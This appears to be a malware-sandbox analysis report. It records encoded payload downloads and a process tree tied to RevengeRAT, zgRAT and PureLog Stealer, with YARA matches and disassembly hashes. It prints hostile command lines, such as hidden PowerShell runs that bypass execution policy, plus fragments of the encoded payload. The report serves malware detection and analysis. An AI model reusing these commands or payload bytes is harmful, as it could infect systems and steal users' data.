                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 49 44 39 43 44 77 42 76 58 77 41 41 43 67 41 6c 49 44 39 43 44 77 42 76 59 41 41 41 43 67 43 41 43 51 41 41 42 48 34 4a 41 41 41 45 66 67 45 41 41 41 52 2b 41 67 41 41 42 43 68 68 41 41 41 4b 62 32 49 41 41 41 6f 41 46 34 41 4b 41 41 41 45 4b 41 34 41 41 41 59 6f 49 41 41 41 42 67 41 55 2f 67 59 65 41 41 41 47 63 32 4d 41 41 41 6f 4b 42 68 51 67 4d 48 55 41 41 43 41 77 64 51 41 41 63 32 51 41 41 41 71 41 44 41 41 41 42 48 4e 6c 41 41 41 4b 67 41 73 41 41 41 51 41 33 68 59 6d 41 42 61 41 43 67 41 41 42 43 43 34 43 77 41 41 4b 42 45 41 41 41 6f 41 41 4e 34 41 41 48 34 4b 41 41 41 45 46 76 34 42 43 77 63 36 45 66 2f 2f 2f 7a 67 33 41 51 41 41 41 41 42 2b 43 51 41 41 42 42 55 57 62 32 59 41 41 41 6f 73 44 58 34 4a 41 41 41 45 62 32 63 41 41 41 6f 57 4d 51 39
                                                                                          Data Ascii: ID9CDwBvXwAACgAlID9CDwBvYAAACgCACQAABH4JAAAEfgEAAAR+AgAABChhAAAKb2IAAAoAF4AKAAAEKA4AAAYoIAAABgAU/gYeAAAGc2MAAAoKBhQgMHUAACAwdQAAc2QAAAqADAAABHNlAAAKgAsAAAQA3hYmABaACgAABCC4CwAAKBEAAAoAAN4AAH4KAAAEFv4BCwc6Ef///zg3AQAAAAB+CQAABBUWb2YAAAosDX4JAAAEb2cAAAoWMQ9
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 45 41 63 33 45 41 41 41 6f 4b 63 32 55 41 41 41 6f 4c 63 32 55 41 41 41 6f 4d 41 69 67 59 41 41 41 47 41 78 55 58 4b 42 67 41 41 41 6f 4e 42 77 49 57 43 52 61 61 62 32 77 41 41 41 70 76 61 67 41 41 43 67 41 49 41 67 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 41 4b 4f 61 51 6b 57 6d 6d 39 73 41 41 41 4b 41 32 39 73 41 41 41 4b 57 46 6c 76 61 67 41 41 43 67 41 47 42 32 39 72 41 41 41 4b 62 33 49 41 41 41 6f 41 42 67 68 76 61 77 41 41 43 6d 39 79 41 41 41 4b 41 41 64 76 56 67 41 41 43 67 41 49 62 31 59 41 41 41 6f 41 42 6d 39 7a 41 41 41 4b 45 77 51 72 41 42 45 45 4b 69 35 7a 49 77 41 41 42 6f 41 55 41 41 41 45 4b 69 49 43 4b 42 59 41 41 41 6f 41 4b 6a 59 41 66 67 59 41 41 41 52 76 64 41 41 41 43 67 41 71 49 67 49 6f 46 67 41 41 43 67 41 71 61
                                                                                          Data Ascii: EAc3EAAAoKc2UAAAoLc2UAAAoMAigYAAAGAxUXKBgAAAoNBwIWCRaab2wAAApvagAACgAIAgkWmm9sAAAKA29sAAAKWAKOaQkWmm9sAAAKA29sAAAKWFlvagAACgAGB29rAAAKb3IAAAoABghvawAACm9yAAAKAAdvVgAACgAIb1YAAAoABm9zAAAKEwQrABEEKi5zIwAABoAUAAAEKiICKBYAAAoAKjYAfgYAAARvdAAACgAqIgIoFgAACgAqa
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 41 43 49 41 41 67 45 41 41 48 6f 44 41 41 42 74 41 42 59 41 4a 51 41 44 41 52 41 41 46 77 41 41 41 44 30 41 47 67 41 6c 41 42 4d 42 41 41 42 73 41 41 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 47 38 42 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 30 41 45 41 41 49 30 41 47 77 41 6e 41 42 4d 42 41 41 44 73 41 51 41 41 6a 51 41 62 41 43 63 41 45 77 45 41 41 46 49 43 41 41 43 4e 41 42 73 41 4a 77 41 54 41 51 41 41 79 51 41 41 41 49 30 41 47 77 41 6e 41 42 59 41 58 67 31 68 41 52 59 41 53 51 31 68 41 52 59 41 50 51 52 68 41 52 59 41 7a 77 31 68 41 52 59 41 48 41 35 68 41 52 59 41 77 67 31 34 41 68 59 41 69 41 70 68 41 52 59 41 4e 77 68 38 41 68 45 41 42 41 32 41 41 68 59 41 4d 51 53 45 41 68 45 41 70 41 69 48 41 68 45 41 73 77 79 4c 41 6a 4d 42 4f 51 4f
                                                                                          Data Ascii: ACIAAgEAAHoDAABtABYAJQADARAAFwAAAD0AGgAlABMBAABsAAAAjQAbACcAEwEAAG8BAACNABsAJwATAQAA0AEAAI0AGwAnABMBAADsAQAAjQAbACcAEwEAAFICAACNABsAJwATAQAAyQAAAI0AGwAnABYAXg1hARYASQ1hARYAPQRhARYAzw1hARYAHA5hARYAwg14AhYAiAphARYANwh8AhEABA2AAhYAMQSEAhEApAiHAhEAswyLAjMBOQO
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 45 41 6d 77 55 41 41 41 45 41 77 77 77 41 41 41 45 41 73 77 4d 41 41 41 45 41 39 41 30 41 41 41 49 41 69 41 6f 41 41 41 45 41 79 77 6b 41 41 41 49 41 30 77 4d 4a 41 4e 6f 4b 41 51 41 52 41 4e 6f 4b 42 67 41 5a 41 4e 6f 4b 43 67 41 70 41 4e 6f 4b 45 41 41 78 41 4e 6f 4b 45 41 41 35 41 4e 6f 4b 45 41 42 42 41 4e 6f 4b 45 41 42 4a 41 4e 6f 4b 45 41 42 52 41 4e 6f 4b 45 41 42 5a 41 4e 6f 4b 45 41 42 68 41 4e 6f 4b 46 51 42 70 41 4e 6f 4b 45 41 42 78 41 4e 6f 4b 45 41 43 42 41 4e 6f 4b 42 67 43 4a 41 4e 6f 4b 42 67 43 35 41 4e 6f 4b 42 67 41 68 41 64 6f 4a 48 77 43 68 41 4e 6f 4b 4a 41 41 70 41 65 77 4d 48 77 43 52 41 4e 6f 4b 4c 41 41 78 41 64 30 4d 4d 67 42 35 41 4e 6f 4b 42 67 43 70 41 4e 6f 4b 42 67 41 35 41 64 63 4d 53 41 42 4a 41 58 51 4f 55 77 43 70 41
                                                                                          Data Ascii: EAmwUAAAEAwwwAAAEAswMAAAEA9A0AAAIAiAoAAAEAywkAAAIA0wMJANoKAQARANoKBgAZANoKCgApANoKEAAxANoKEAA5ANoKEABBANoKEABJANoKEABRANoKEABZANoKEABhANoKFQBpANoKEABxANoKEACBANoKBgCJANoKBgC5ANoKBgAhAdoJHwChANoKJAApAewMHwCRANoKLAAxAd0MMgB5ANoKBgCpANoKBgA5AdcMSABJAXQOUwCpA
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 44 77 42 41 56 67 41 41 45 41 42 51 56 67 41 41 45 51 42 59 56 67 41 41 45 67 42 67 56 67 41 41 45 77 41 45 67 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 6f 42 51 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 56 41 77 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 56 41 73 55 49 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 34 43 43 77 30 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 56 51 4c 67 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 65 41 76 30 44 41 41 41 41 41 41 73 41 41 67 41 4d 41 41 63 41 44 51 41 4a 41 41 34 41 43 67 41 50 41 41 6f 41 45 41 41 4b 41 42 45 41 43 67 41 53 41 41 6f 41 45 77 41 4b 41 41 41 41 41 41 41 41 50 44 34
                                                                                          Data Ascii: DwBAVgAAEABQVgAAEQBYVgAAEgBgVgAAEwAEgAAAAQAAAAAAAAAAAAAAAAAoBQAABAAAAAAAAAAAAAAAVQLVAwAAAAAEAAAAAAAAAAAAAABVAsUIAAAAAAQAAAAAAAAAAAAAAF4CCw0AAAAABAAAAAAAAAAAAAAAVQLgCwAAAAAKAAAAAAAAAAAAAABeAv0DAAAAAAsAAgAMAAcADQAJAA4ACgAPAAoAEAAKABEACgASAAoAEwAKAAAAAAAAPD4
                                                                                          2024-12-11 10:25:37 UTC1378INData Raw: 55 31 4d 45 55 31 4e 55 4d 79 51 7a 67 33 4f 55 59 79 4d 6a 4d 79 4f 54 6c 46 51 6a 45 31 4e 30 56 45 4e 54 67 78 4d 7a 46 47 4e 44 6c 45 4e 7a 56 44 51 7a 68 45 52 44 68 46 41 45 56 59 52 55 4e 56 56 45 6c 50 54 6c 39 54 56 45 46 55 52 51 42 48 41 45 67 41 52 31 5a 4a 41 45 6f 41 54 51 42 4f 41 46 4e 35 63 33 52 6c 62 53 35 4a 54 77 42 4a 55 41 42 52 41 45 56 54 58 30 4e 50 54 6c 52 4a 54 6c 56 50 56 56 4d 41 56 41 42 48 5a 58 52 42 56 67 42 48 52 6c 63 41 57 41 42 32 59 57 78 31 5a 56 39 66 41 45 64 6c 64 45 4e 68 62 57 56 79 59 51 42 74 63 32 4e 76 63 6d 78 70 59 67 41 38 50 6d 4d 41 55 33 6c 7a 64 47 56 74 4c 6b 4e 76 62 47 78 6c 59 33 52 70 62 32 35 7a 4c 6b 64 6c 62 6d 56 79 61 57 4d 41 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6c 5a 70 63 33 56 68 62
                                                                                          Data Ascii: U1MEU1NUMyQzg3OUYyMjMyOTlFQjE1N0VENTgxMzFGNDlENzVDQzhERDhFAEVYRUNVVElPTl9TVEFURQBHAEgAR1ZJAEoATQBOAFN5c3RlbS5JTwBJUABRAEVTX0NPTlRJTlVPVVMAVABHZXRBVgBHRlcAWAB2YWx1ZV9fAEdldENhbWVyYQBtc2NvcmxpYgA8PmMAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3Vhb


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:05:24:57
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\stage2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:05:24:57
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:05:25:13
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:05:25:26
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:05:25:29
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\PDF\1.bat" "
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff6901a0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:14
                                                                                          Start time:05:25:34
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:15
                                                                                          Start time:05:25:37
                                                                                          Start date:11/12/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                          Imagebase:0x450000
                                                                                          File size:2'141'552 bytes
                                                                                          MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Revengerat_db91bcc6, Description: unknown, Source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 00007FFD9B952DC1 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4da6d80fedcc1b2bef27f73e3795b369a157fc856758ed94cdf5db182d167309
                                                                                            • Instruction ID: 359c43d9d84a3809fac08b07afb5ee62306e56f2bc80133087980c999cc96c57
                                                                                            • Opcode Fuzzy Hash: 4da6d80fedcc1b2bef27f73e3795b369a157fc856758ed94cdf5db182d167309
                                                                                            • Instruction Fuzzy Hash: 4B715562B2FA8E1FEBB896EC18352B83BC1EF55750B1900BED81DC30E2DD48AD458341
                                                                                            Function 00007FFD9B952E3A Relevance: .1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07f9e5d9339af085f6335308adb2dcc020c0d6139aa29350cf48971a8a7056ff
                                                                                            • Instruction ID: 1050c2cb80e585b5702226335aee9da843413132d3e7bf5a57e142bdae9d58f2
                                                                                            • Opcode Fuzzy Hash: 07f9e5d9339af085f6335308adb2dcc020c0d6139aa29350cf48971a8a7056ff
                                                                                            • Instruction Fuzzy Hash: 8731E163F2FA8A1BFBB992E818751783AC19F51650B6A00BEDC6DC30E3ED486D454211
                                                                                            Function 00007FFD9B8837B5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 57527a6f62166d1b39b571920a0cef6bcf163646589e570ece9fb3c5b1259c8a
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 1D01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1D632E882CB41
                                                                                            Function 00007FFD9B951D55 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abaa93cb468e4c5d666a8116b1368d7f0ed6f4223c11292b6454c9a9ebb57a1a
                                                                                            • Instruction ID: d14b32ee881f3a4b9081672b524b35d53b85bb7c60ce163be8a443dd154d1293
                                                                                            • Opcode Fuzzy Hash: abaa93cb468e4c5d666a8116b1368d7f0ed6f4223c11292b6454c9a9ebb57a1a
                                                                                            • Instruction Fuzzy Hash: 78F05931F1D90E5FE3A9A69C74615F8B3D2EFC4224B1441FAE51CC30ABDE26A8018340
                                                                                            Function 00007FFD9B951FF6 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf8d4e057fb729039585a4aca8ca2c491b79339ca47094ad315ddd2533388717
                                                                                            • Instruction ID: c64d4ec4a73e8d3281d3fd37b8c7a804e05fc1f7416d1f358ee03f967069d7bc
                                                                                            • Opcode Fuzzy Hash: bf8d4e057fb729039585a4aca8ca2c491b79339ca47094ad315ddd2533388717
                                                                                            • Instruction Fuzzy Hash: 42E04F23F5FD2E1AF7A5A9EC2C2A5F5A2C0DF46721F4A01B3D91CD32A6ED04AD1142D1
                                                                                            Function 00007FFD9B953195 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1899412971.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b950000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 15e10d8c3b2659ddf2803a36442cfaeaab8aee788d6546996338e2d8194e2f9b
                                                                                            • Instruction ID: 9cfac1627038dcc0bd2a52f1d0be25492c22f3ac43a9754fad40b20037d5ba30
                                                                                            • Opcode Fuzzy Hash: 15e10d8c3b2659ddf2803a36442cfaeaab8aee788d6546996338e2d8194e2f9b
                                                                                            • Instruction Fuzzy Hash: 7CE04F22E5E92D1EF7B5A1AC28256F46381DF49720B4641B6D92AD31A6EE04AD144181
                                                                                            Function 00007FFD9B88D3BE Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3d125959f7f6c00af46b5d94fc46a6b2f43c621c29b5b484e72b7ba98a7b228
                                                                                            • Instruction ID: 43ce9a6eb90173769d5e5ab79baa01a8238b2a858715d747b48d40be974672fb
                                                                                            • Opcode Fuzzy Hash: e3d125959f7f6c00af46b5d94fc46a6b2f43c621c29b5b484e72b7ba98a7b228
                                                                                            • Instruction Fuzzy Hash: 3EE0DF60A0FACE4FD34DEBB4885496A7BA1EF09304B0508FCD46A8B09BC838A9028341

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD9B8890D3 Relevance: .2, Instructions: 167COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5e23ea2178b1654571199605aabe39be9818a88e2c097ebdd080a8aeac60997
                                                                                            • Instruction ID: d0224481de9661af9c470a5858262460c77b8afb709832f1b836577ca16fa09f
                                                                                            • Opcode Fuzzy Hash: c5e23ea2178b1654571199605aabe39be9818a88e2c097ebdd080a8aeac60997
                                                                                            • Instruction Fuzzy Hash: AC410BA7B0853587D30A7BBDBD695F8B340DF84375B0446B7C39ACF087A964648796C0
                                                                                            Function 00007FFD9B8885FA Relevance: 6.4, Strings: 5, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1898819114.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
